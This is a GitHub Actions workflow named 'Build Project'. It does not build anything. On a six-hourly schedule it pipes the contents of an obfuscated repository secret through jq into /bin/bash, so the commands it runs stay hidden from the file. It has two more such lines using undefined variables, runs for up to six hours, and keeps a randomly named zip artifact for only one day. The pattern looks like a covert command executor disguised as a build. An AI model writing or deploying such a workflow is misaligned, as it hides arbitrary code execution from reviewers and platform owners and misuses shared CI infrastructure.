name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '52 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Invoke
        env:
          xqww67682: ${{ secrets.xqww67682 }}
        run: |
          printf '%s' "$xqww67682" | jq -r .cisi805 | /bin/bash
          printf '%s' "$tc0305" | jq -r .um82 | /bin/bash
          printf '%s' "$ykcg4953" | jq -r .rkmjc4 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: UBpyoUGc
          path: "*.zip"
          retention-days: 1
